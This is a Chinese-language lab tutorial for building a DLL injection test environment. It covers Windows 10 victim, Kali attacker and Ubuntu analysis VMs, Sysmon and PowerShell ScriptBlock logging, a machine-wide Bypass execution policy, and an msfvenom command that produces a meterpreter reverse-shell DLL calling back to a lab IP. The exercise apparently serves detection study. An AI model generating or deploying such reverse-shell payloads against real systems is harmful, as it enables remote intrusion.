环境构建
【DLL注入的环境构建】
使用Vmware安装系统镜像:Windows10(victim),kali(攻击)、Ubuntu22.04.2(日志分析)。
在Ubuntu20.04.2安装Wireshark与Volatility;方法参考其代码仓库。Kali已内置安全框架,直接安装即可。
Windows 10 Enterprise至Microsoft Tech Community下载。
2.1 Sysmon
该工具安装时务必指定配置文件,如使用默认的参数可能导致日志记录不全面。直接参考配置文件Neo23x0-sysmon-config(Florian Roth)。安装完成后运行Powershell命令行:Get-Service sysmon验证是否安装成功。
2.2 配置PowerShell ScriptBlock日志
PowerShell 日志类型:Module、ScriptBlock logging、Script Execution、Transcription。为了收集脚本执行日志,将配置并激活 ScriptBlock。以管理员运行Powershell,执行如下命令:1)更改powershell执行策略,以允许后续配置更改;
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
3.1 生成dll文件
(1)在Kali VM使用msfvenom生成payload,msfvenom是Metasploit框架中的组件。命令如下:
sudo msfvenom -p windows/meterpreter/reverse_tcp Lhost=192.168.26.130 Lport=88 -f dll > /home/hacker/Desktop/evil.dll
Lhost 表示监听的主机,此处代表Kali主机,
Lport 表示监听的端口.
-f 生成的文件类型,此处是dll。